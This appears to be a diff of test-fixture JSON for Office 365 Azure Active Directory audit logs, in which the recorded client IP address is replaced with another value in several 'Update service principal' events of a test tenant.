@@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-11T16:42:45", "ExtendedProperties": [ { @@ -19182,7 +19182,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:42:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"531446ed-abd2-468f-96a8-a4dcc7b05168\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:42:45.1042022Z\"},{\"Name\":\"env_epoch\",\"Value\":\"VYXPT\"},{\"Name\":\"env_seqNum\",\"Value\":\"45826464\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR559\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"15adbe69-7974-41ec-8341-208456600ad3\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Update service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:42:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"531446ed-abd2-468f-96a8-a4dcc7b05168\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:42:45.1042022Z\"},{\"Name\":\"env_epoch\",\"Value\":\"VYXPT\"},{\"Name\":\"env_seqNum\",\"Value\":\"45826464\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR559\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"15adbe69-7974-41ec-8341-208456600ad3\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Update service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -19212,9 +19212,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-11T16:42:45", "ExtendedProperties": [ { @@ -19429,7 +19429,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:42:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"531446ed-abd2-468f-96a8-a4dcc7b05168\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:42:45.1042022Z\"},{\"Name\":\"env_epoch\",\"Value\":\"VYXPT\"},{\"Name\":\"env_seqNum\",\"Value\":\"45826464\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR559\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"15adbe69-7974-41ec-8341-208456600ad3\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Update service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:42:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"531446ed-abd2-468f-96a8-a4dcc7b05168\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:42:45.1042022Z\"},{\"Name\":\"env_epoch\",\"Value\":\"VYXPT\"},{\"Name\":\"env_seqNum\",\"Value\":\"45826464\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR559\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"15adbe69-7974-41ec-8341-208456600ad3\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Update service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -19459,9 +19459,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-11T16:42:45", "ExtendedProperties": [ { @@ -19676,7 +19676,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:42:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"531446ed-abd2-468f-96a8-a4dcc7b05168\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:42:45.1042022Z\"},{\"Name\":\"env_epoch\",\"Value\":\"VYXPT\"},{\"Name\":\"env_seqNum\",\"Value\":\"45826464\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR559\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"15adbe69-7974-41ec-8341-208456600ad3\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Update service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:42:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a